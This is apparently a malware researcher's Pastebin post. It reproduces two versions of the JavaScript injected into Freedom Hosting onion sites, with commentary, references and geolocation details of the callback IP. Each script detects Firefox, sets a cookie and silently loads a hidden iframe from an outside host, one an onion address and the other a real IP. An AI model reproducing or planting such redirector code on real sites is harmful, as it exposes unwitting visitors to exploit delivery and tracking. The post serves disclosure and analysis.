Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMustDie!
- # This is the malicious Javascript set codes injected to the Freedom Hosting site
- # It contents the IFRAMER Malware method to redirect the victim to infector site, in url:
- # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
- #
- # Original copy at: www.twitlonger.com/show/n_1rlo0uu
- # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!
- # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.
- # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
- # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
- # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
- # Ref: http://www.twitlonger.com/show/n_1rlo0uu
- # Ref: http://pastebin.com/bu2Ya0n6
- # Ref: http://pastebin.com/pmGEj9bV
- // Case 1
- function createCookie(name,value,minutes) {
- if (minutes) {
- var date = new Date();
- date.setTime(date.getTime()+(minutes*60*1000));
- var expires = "; expires="+date.toGMTString();
- }
- else var expires = "";
- document.cookie = name+"="+value+expires+"; path=/";
- }
- function readCookie(name) {
- var nameEQ = name + "=";
- var ca = document.cookie.split(';');
- for(var i=0;i < ca.length;i++) {
- var c = ca[i];
- while (c.charAt(0)==' ') c = c.substring(1,c.length);
- if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
- }
- return null;
- }
- function isFF() {
- return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
- }
- function updatify() {
- var iframe = document.createElement('iframe');
- iframe.style.display = "inline";
- iframe.frameBorder = "0";
- iframe.scrolling = "no";
- iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
- iframe.height = "5";
- iframe.width = "*";
- document.body.appendChild(iframe);
- }
- function format_quick() {
- if ( ! readCookie("n_serv") ) {
- createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
- updatify();
- }
- }
- function isReady()
- {
- if ( document.readyState === "interactive" || document.readyState === "complete" ) {
- if ( isFF() ) {
- format_quick();
- }
- }
- else
- {
- setTimeout(isReady, 250);
- }
- }
- setTimeout(isReady, 250);
- // Case 2
- function createCookie(name, value, minutes) {
- if (minutes) {
- var date = new Date();
- date.setTime(date.getTime() + (minutes * 60 * 1000));
- var expires = "; expires=" + date.toGMTString();
- } else var expires = "";
- document.cookie = name + "=" + value + expires + "; path=/";
- }
- function readCookie(name) {
- var nameEQ = name + "=";
- var ca = document.cookie.split(';');
- for (var i = 0; i < ca.length; i++) {
- var c = ca[i];
- while (c.charAt(0) == ' ') c = c.substring(1, c.length);
- if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
- }
- return null;
- }
- function isFF() {
- return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
- }
- function updatify() {
- var iframe = document.createElement('iframe');
- iframe.style.display = "inline";
- iframe.frameBorder = "0";
- iframe.scrolling = "no";
- iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
- iframe.height = "5";
- iframe.width = "*";
- document.body.appendChild(iframe);
- }
- function freedomhost() {
- if (!readCookie("n_serv")) {
- createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
- updatify();
- }
- }
- function isReady() {
- if (document.readyState === "interactive" || document.readyState === "complete") {
- if (isFF()) {
- //window.alert(window.location + "Firefox Detected.")
- freedomhost();
- }
- } else {
- setTimeout(isReady, 250);
- }
- }
- setTimeout(isReady, 250);
- // Noted, same method,
- // second script is w/IP info callback, contacting remote host as per marked (1)
- IP Address: 65.222.202.53
- City: Triadelphia
- State or Region: West Virginia
- Country: United States
- ISP: Verizon Business
- Latitude & Longitude: 40.0900-80.6220
- Domain: verizonbusiness.com
- ZIP Code: 26059
- ---
- #MalwareMustDie! @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement